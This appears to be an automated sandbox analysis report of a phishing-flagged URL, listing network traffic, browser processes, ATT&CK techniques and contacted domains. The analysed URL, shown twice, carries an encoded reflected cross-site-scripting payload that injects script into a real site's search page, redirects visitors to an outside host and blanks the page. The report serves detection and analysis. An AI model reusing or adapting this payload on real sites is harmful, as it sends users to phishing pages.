      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.16:49797 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.16:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49897 version: TLS 1.2
      Source: classification engineClassification label: mal60.phis.win@18/121@78/389
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%30
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1860,i,8896414635319004165,15107896085658579415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1860,i,8896414635319004165,15107896085658579415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Obfuscated Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://www.ibisworld.com//search///default.aspx?st=%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%37%37%25%36%39%25%36%45%25%36%34%25%36%46%25%37%37%25%35%42%25%32%37%25%36%43%25%36%46%25%36%33%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%32%37%25%35%44%25%35%42%25%32%37%25%37%32%25%36%35%25%37%30%25%36%43%25%36%31%25%36%33%25%36%35%25%32%37%25%35%44%25%32%38%25%35%42%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%36%39%25%36%44%25%37%30%25%37%35%25%37%34%25%36%35%25%36%43%25%36%35%25%37%34%25%37%34%25%36%35%25%37%32%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%30%25%32%46%25%33%33%25%33%33%25%33%35%25%36%35%25%33%31%25%33%30%25%33%34%25%33%38%25%36%34%25%33%30%25%33%33%25%33%39%25%36%33%25%33%37%25%33%31%25%33%35%25%36%31%25%33%33%25%36%32%25%33%38%25%33%32%25%33%37%25%33%39%25%33%32%25%36%35%25%33%32%25%33%31%25%33%32%25%33%37%25%36%31%25%36%31%25%36%34%25%32%37%25%32%43%25%32%37%25%32%46%25%32%37%25%32%43%25%32%3713%25%32%46139%25%32%448761%25%32%46964%25%32%4418418%25%32%4415995%25%32%37%25%35%44%25%35%42%25%32%37%25%36%41%25%36%46%25%36%39%25%36%45%25%32%37%25%35%44%25%32%38%25%32%37%25%32%37%25%32%39%25%32%39%25%32%43%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%35%42%25%32%37%25%36%32%25%36%46%25%36%34%25%37%39%25%32%37%25%35%44%25%35%42%25%32%37%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%32%37%25%35%44%25%35%42%25%32%37%25%36%46%25%37%30%25%36%31%25%36%33%25%36%39%25%37%34%25%37%39%25%32%37%25%35%44%25%33%44%25%33%30%25%37%38%25%33%30%25%33%42%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%300%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      151.101.1.229
      truefalse
        unknown
        tls13.taboola.map.fastly.net
        151.101.129.44
        truefalse
          unknown
          sc.ec424.com
          104.22.65.78
          truefalse
            unknown
            alb-retail-us-1014447198.us-west-2.elb.amazonaws.com
            44.242.83.217
            truefalse
              high
              subscription.trk-adulvion.com
              172.67.177.226
              truefalse
                unknown
                cdn-cookieyes.com
                172.67.20.8
                truefalse
                  unknown
                  event.trk-adulvion.com
                  104.21.80.104
                  truefalse
                    unknown
                    mobile-gtalk.l.google.com
                    142.251.16.188
                    truefalse
                      high
                      br.geo.xn846.com
                      46.229.160.76
                      truefalse
                        unknown
                        cdn.matomo.cloud
                        108.138.106.116
                        truefalse
                          unknown
                          ipinfo.io
                          34.117.186.192
                          truefalse
                            high
                            cdnjs.cloudflare.com
                            104.17.25.14
                            truefalse
                              high
                              www.google.com
                              142.251.41.4
                              truefalse
                                high
                                trk-adulvion.com
                                172.67.177.226
                                truefalse
                                  unknown
                                  www.electronixmaster.com
                                  172.67.156.232
                                  truetrue
                                    unknown
                                    android.l.google.com
                                    142.250.176.206
                                    truefalse
                                      high
                                      imputeletter.com
                                      185.147.127.178
                                      truefalse
                                        unknown
                                        go-g3t-msg.com
                                        49.12.134.254
                                        truefalse
                                          unknown
                                          d47-usw-1.algolia.net
                                          209.58.135.84
                                          truefalse
                                            unknown
                                            trk-amropode.com
                                            172.67.205.30
                                            truefalse
                                              unknown
                                              qwartiqpin.online
                                              104.21.61.98
                                              truefalse
                                                unknown
                                                extension.trk-amropode.com
                                                104.21.22.140
                                                truefalse
                                                  unknown
                                                  notification.trk-amropode.com
                                                  104.21.22.140
                                                  truefalse
                                                    unknown
                                                    unisonroad.com
                                                    167.71.30.39
                                                    truefalse
                                                      unknown
                                                      cdn4image.com
                                                      157.90.1.66
                                                      truefalse
                                                        unknown
                                                        www.nrj1hs34m.com
                                                        34.149.120.191
                                                        truefalse
                                                          unknown
                                                          log.cookieyes.com
                                                          52.214.78.235
                                                          truefalse
                                                            unknown
                                                            pushclk.com
                                                            172.67.171.114
                                                            truefalse
                                                              unknown
                                                              jadesglow.com
                                                              23.94.102.180
                                                              truefalse
                                                                unknown
                                                                api.taboola.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  cdn.jsdelivr.net
